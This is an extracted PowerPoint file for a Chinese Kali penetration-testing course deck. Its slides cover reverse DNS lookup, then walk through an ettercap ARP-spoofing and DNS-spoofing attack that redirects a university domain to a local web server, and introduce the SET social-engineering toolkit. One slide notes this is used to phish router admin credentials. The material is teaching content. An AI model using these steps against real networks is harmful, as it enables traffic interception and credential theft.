Target="../media/image54.png"/></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5.png"/></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6.png"/></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7.png"/></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5.png"/></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8.png"/></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9.png"/></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0.png"/></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0.png"/></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0.png"/></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1.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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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6.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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8.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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9.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide7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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.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s>

</file>

<file path=ppt/slides/_rels/slide8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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide8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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide8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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide8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0.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide8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1.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide85.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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide8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3.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide8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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.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s>

</file>

<file path=ppt/slides/_rels/slide9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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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8.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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9.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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0.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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1.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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8.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide9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9.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5" name="Shape 145"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Kali渗透实战</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>－2016年7月16日</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8" name="Shape 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590550" y="717549"/>
            <a:ext cx="2933701" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>反向地址解析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Shape 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699699" y="2054225"/>
            <a:ext cx="11808602" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>我们经常使用到得DNS服务器里面有两个区域，即“正向查找区域”和“反向查找区域”，正向查找区域就是我们通常所说的域名解析，反向查找区域即是这里所说的IP反向解析，它的作用就是通过查询IP地址的PTR记录来得到该IP地址指向的域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647173" y="4546599"/>
            <a:ext cx="11710455" cy="3606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500"/>
            </a:pPr>
            <a:r>
              <a:t>由于在域名系统中，一个IP地址可以对应多个域名，因此从IP出发去找域名，理论上应该遍历整个域名树，但这在Internet上是不现实的。为了完成逆向域名解析，系统提供一个特别域，该特别域称为逆向解析域in-addr.arpa。这样欲解析的IP地址就会被表达成一种像域名一样的可显示串形式，后缀以逆向解析域域名”in-addr.arpa"结尾。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>例如一个IP地址：222.211.233.244，其逆向域名表达方式为：244.233.221.222.in-addr.arpa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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8" name="Shape 678"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="1942505"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ettercap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Shape 679"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1449155"/>
            <a:ext cx="11406727" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> ettercap是一个强大的欺骗工具，能够让测试人员以极快的速度创建和发送伪造的包、从网络适配器到应用软件各种级别的包、绑定监听数据到一个本地端口等。是中间人攻击中常用到的辅助工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Shape 680"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660601" y="8674100"/>
            <a:ext cx="19431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实例演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Shape 681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706912" y="8724900"/>
            <a:ext cx="7480991" cy="635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000">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>MIMT之DNS欺骗(钓鱼)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Shape 682"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2927349" y="7947025"/>
            <a:ext cx="646430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>不过多介绍，有兴趣的小伙伴可以自行了解下</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="683" name="image101.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="3054350"/>
            <a:ext cx="11226800" cy="4584700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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5" name="Shape 685"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637063" y="546099"/>
            <a:ext cx="10101898"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配置dns(/etc/ettercap/etter.dns)     172.16.211.128为本机在局域网地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="686" name="image102.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="643679" y="4133105"/>
            <a:ext cx="10672021" cy="712790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Shape 687"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637062" y="3519732"/>
            <a:ext cx="2619059"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开启本地web服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="688" name="image103.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2680916" y="5898305"/>
            <a:ext cx="7642969" cy="4133150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Shape 689"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637063" y="5092699"/>
            <a:ext cx="4683443"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直接访问会返回apache默认页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="690" name="image104.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995279" y="1195836"/>
            <a:ext cx="7642971" cy="2040728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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2" name="Shape 692"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637062" y="546099"/>
            <a:ext cx="10188259"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使用命令ettercap -G 启动ettercap，并选择Unifind sniffing进行网卡配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="693" name="image105.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140910" y="1209437"/>
            <a:ext cx="7893831" cy="5044350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="694" name="image106.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3528257" y="2873220"/>
            <a:ext cx="5373137" cy="1716784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Shape 695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879396" y="6612324"/>
            <a:ext cx="743458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接着扫描存活的主机，扫描完毕点击下图的Hosts list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="696" name="image107.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1888145" y="7313121"/>
            <a:ext cx="9592655" cy="1819906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411390" y="1989059"/>
            <a:ext cx="825853" cy="825853"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF2600"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>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10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9" name="Shape 699"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637063" y="546099"/>
            <a:ext cx="7788276"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将网关地址添加到 target1，将攻击目标添加到  target2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Shape 700"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866696" y="6070151"/>
            <a:ext cx="8034338"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接着设置中间人攻击的形式为ARP欺骗，并设置双向欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="701" name="image108.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1888045" y="1192615"/>
            <a:ext cx="8522906" cy="4429392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="702" name="image109.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270616" y="7077098"/>
            <a:ext cx="4835814" cy="1799588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="703" name="image110.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7594600" y="6924867"/>
            <a:ext cx="3495813" cy="1900850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Shape 704"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163990" y="7976890"/>
            <a:ext cx="1506978" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF2600"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>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10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6" name="Shape 706"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637063" y="546099"/>
            <a:ext cx="350139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接着启用dns_spoof插件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707" name="Shape 707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739695" y="5321299"/>
            <a:ext cx="2671764"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接着开始DNS欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="708" name="image111.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="498032" y="2199175"/>
            <a:ext cx="4165440" cy="1900851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="709" name="image112.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726508" y="1764743"/>
            <a:ext cx="6780260" cy="2769715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4109322" y="3445429"/>
            <a:ext cx="1506978" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF2600"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45718" tIns="45718" rIns="45718" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="711" name="image113.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922415" y="6440189"/>
            <a:ext cx="7526385" cy="2183111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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3" name="Shape 713"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637062" y="546099"/>
            <a:ext cx="8934769"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然后在目标主机上浏览www.hdu.edu.cn 时就能达到欺骗的效果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="714" name="image114.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1542731" y="1352447"/>
            <a:ext cx="8934769" cy="6648095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715" name="Shape 715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866615" y="8115299"/>
            <a:ext cx="10777936" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DNS欺骗在内网渗透中往往用于获取管理员信息、钓鱼等。例如可以伪造内网路由器管理页面，欺骗用户在管理页面输入真实账号密码等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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7" name="Shape 717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721350" y="459911"/>
            <a:ext cx="1028173"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Shape 718"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1220556"/>
            <a:ext cx="11406727" cy="193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914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SET是利用社会工程学理论的工具集。它与metasploit连接，自动构建可应用于社会工程学技术的微软最新楼漏洞、Adobe PDF漏洞、Java Applet漏洞等多种环境。它不仅使用方便，而且还能巧妙地瞒过普通用户的眼睛。因此，也是极其危险的工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="Shape 719"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654050" y="3492498"/>
            <a:ext cx="10927716"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在shell中输入setoolkit启动SET，它可进行社工、渗透等测试，此处选1即社工</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="720" name="image115.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="900038" y="4291243"/>
            <a:ext cx="10435737" cy="4607989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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22" name="image116.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
